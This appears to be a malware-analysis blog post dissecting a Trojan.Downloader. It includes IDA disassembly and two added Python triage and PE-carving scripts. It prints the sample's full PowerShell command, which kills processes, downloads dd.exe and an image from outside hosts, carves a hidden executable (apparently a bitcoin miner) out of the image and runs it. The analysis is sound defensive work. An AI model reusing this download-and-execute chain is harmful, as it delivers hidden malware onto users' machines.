A look at a Trojan.Downloader I came across on VirusTotal Intelligence. Turned out to be a file hiding more secrets than a wife hiding an affair!
There is a single function in the binary, main(), which has been compiled using MinGW (PEStudio signature: MingWin32 v?.? (h)). The sections are pretty standard, which makes me think the binary hasn't been packed; according to PEStudio they are: .text, .data, .rdata, .bss, .idata
The function of interest (main) looks as follows:
.text:00401290 ; =============== S U B R O U T I N E =======================================
.text:00401290
.text:00401290 ; Attributes: bp-based frame
.text:00401290
.text:00401290 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:00401290 public _main
.text:00401290 _main proc near ; CODE XREF: ___mingw_CRTStartup+E2p
.text:00401290
.text:00401290 Command = dword ptr -8
.text:00401290 var_4 = dword ptr -4
.text:00401290 argc = dword ptr 8
.text:00401290 argv = dword ptr 0Ch
.text:00401290 envp = dword ptr 10h
.text:00401290
.text:00401290 push ebp
.text:00401291 mov ebp, esp
.text:00401293 sub esp, 8
.text:00401296 and esp, 0FFFFFFF0h
.text:00401299 mov eax, 0
.text:0040129E add eax, 0Fh
.text:004012A1 add eax, 0Fh
.text:004012A4 shr eax, 4
.text:004012A7 shl eax, 4
.text:004012AA mov [ebp+var_4], eax
.text:004012AD mov eax, [ebp+var_4]
.text:004012B0 call __alloca
.text:004012B5 call ___main
.text:004012BA mov [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"...
.text:004012C1 call _system
.text:004012C6 mov eax, 0
.text:004012CB leave
.text:004012CC retn
.text:004012CC _main endp
.text:004012CC
.text:004012CC ; ---------------------------------------------------------------------------
Looking through the disassembly above, there are two things to notice:
1. .text:004012BA mov [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"... : this is the command string that will be executed.
2. .text:004012C1 call _system : the string is passed to the C library system() function (http://www.cplusplus.com/reference/cstdlib/system/), which hands it to the command interpreter.
The command which is executed is as follows:
powershell \"Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');\"
So a PowerShell session is loaded and a bunch of commands are executed, which are as follows:
Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;
(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');
(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');
(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');
Start-Sleep -s 10;
(New-Object -com Shell.Application).ShellExecute('svchost.exe');
The script won’t actually run, due to HTTPS issues; but what if… Let’s keep exploring.
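To get the indicators out of a one-liner like this without running it, the following added example (my own code, not from the post) splits the command on statement separators outside quotes and classifies each statement as a process kill, a download, an execution or a sleep. The sample input is the command quoted from the post.

```python
import re

# The PowerShell one-liner handed to system() by the sample, quoted from the post.
CMD = ("Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;"
       "Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;"
       "Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;"
       "Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;"
       "Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;"
       "(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');"
       "(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');"
       "(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');"
       "Start-Sleep -s 10;"
       "(New-Object -com Shell.Application).ShellExecute('svchost.exe');")

def split_statements(cmd: str) -> list:
    """Split on ';' only when outside single or double quotes."""
    out, cur, quote = [], [], None
    for ch in cmd:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == ";":
            out.append("".join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    if "".join(cur).strip():
        out.append("".join(cur).strip())
    return out

KILL = re.compile(r"Stop-Process\s+-NAME\s+(\S+)", re.I)
DOWNLOAD = re.compile(r"\.DownloadFile\('([^']+)','([^']+)'\)", re.I)
EXEC = re.compile(r"\.ShellExecute\('([^']+)'(?:,'([^']*)')?\)", re.I)

def triage(cmd: str) -> dict:
    """Classify each statement; collect killed process names, (url, path) pairs,
    (program, args) pairs and anything the parser did not recognise."""
    r = {"killed": [], "downloads": [], "executes": [], "unknown": []}
    for st in split_statements(cmd):
        if m := KILL.search(st):
            r["killed"].append(m.group(1))
        elif m := DOWNLOAD.search(st):
            r["downloads"].append((m.group(1), m.group(2)))
        elif m := EXEC.search(st):
            r["executes"].append((m.group(1), m.group(2) or ""))
        elif not st.lower().startswith("start-sleep"):
            r["unknown"].append(st)
    # A download immediately followed by execution of the dropped file is the
    # classic downloader pattern worth alerting on.
    r["download_and_execute"] = bool(r["downloads"]) and bool(r["executes"])
    return r
```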
The script downloads dd, a Unix utility used to convert and copy files (here a Windows port). It also downloads an image, saves it as favicon.jpg, then uses dd to cut a binary out of it…
That is pretty… odd… It means there is some steganography going on behind the scenes in that image.
To save time cutting out bytes and dissecting favicon.jpg by hand, I'm just going to run the dd command which the script would otherwise have executed.
$ dd.exe if=favicon.jpg of=svchost.exe skip=2931 bs=1
rawwrite dd for windows version 0.6beta3.
Written by John Newbigin <[email protected]>
This program is covered by terms of the GPL Version 2.
skip to 2931
343040+0 records in
343040+0 records out
Things get pretty interesting here. svchost.exe is a valid binary. It was embedded within the image in a way that didn't invalidate the image – thus allowing it to be hosted on imagehousing.com! Pretty cool if you ask me!
In any event, svchost.exe is a 64-bit bitcoin miner 🙂
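The dd invocation (skip=2931 bs=1) assumes the PE simply sits at a fixed byte offset inside the JPEG. The following added example (my own code, not from the post, and not using the real favicon.jpg) shows the check a defender can run over a suspicious image: locate the JPEG end-of-image marker, search for an MZ header whose e_lfanew points at a PE signature, and carve from that offset exactly as dd would. The sample image and the fake PE header are constructed inline.

```python
import struct

# Constructed sample: a minimal JPEG (SOI ... EOI) with a fake PE header
# appended after the image data. Not the real sample from the post.
JPEG_STUB = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + b"\x00" * 40 + b"\xff\xd9")

def make_fake_pe() -> bytes:
    """Minimal MZ/PE header: e_lfanew at offset 0x3c points at 'PE\\0\\0'."""
    dos = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew = 0x40 (right after DOS header)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20

def jpeg_end(data: bytes) -> int:
    """Offset just past the first EOI marker (FF D9), or -1 if absent."""
    i = data.find(b"\xff\xd9")
    return -1 if i < 0 else i + 2

def find_embedded_pe(data: bytes) -> int:
    """Offset of the first MZ header whose e_lfanew lands on 'PE\\0\\0', else -1.
    A bare 'MZ' is not enough: the PE signature check avoids false hits."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if sig + 4 <= len(data) and data[sig:sig + 4] == b"PE\x00\x00":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return -1

def carve(data: bytes, skip: int) -> bytes:
    """Equivalent of `dd if=image of=out skip=N bs=1`: every byte from offset N."""
    return data[skip:]

def analyse(data: bytes) -> dict:
    """Summarise where the image data ends, how much trails it, and any PE found."""
    end = jpeg_end(data)
    pe_off = find_embedded_pe(data)
    return {
        "jpeg_end": end,
        "trailing_bytes": len(data) - end if end >= 0 else -1,
        "pe_offset": pe_off,
        "carved": carve(data, pe_off) if pe_off >= 0 else b"",
    }

if __name__ == "__main__":
    r = analyse(JPEG_STUB + make_fake_pe())
    print(f"image ends at {r['jpeg_end']}, PE at {r['pe_offset']}, carved {len(r['carved'])} bytes")
```

Trailing bytes after EOI are not proof of anything by themselves (many tools append metadata), but a valid PE header there is a strong signal, and the carved bytes can be hashed and compared against the post's VirusTotal entries.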
- original binary – https://www.virustotal.com/en/file/9da0a9fb4f6a044b83ebf829dc1950eccc07c077a3a32f1378f5f6f19f28192c/analysis/
- favicon.jpg – https://www.virustotal.com/file/43deab7498966d3d955fa23fbfd9cc2d5c363417c8eddd4b8db8e3e0fdeeb28f/analysis/
- svchost.exe – https://www.virustotal.com/file/0ab9eed74a03bce3b40e02c77f74718c7110ceadd946484da9227c2f2a76cdbe/analysis/
- PEStudio – https://www.winitor.com/
- Hex-Rays IDA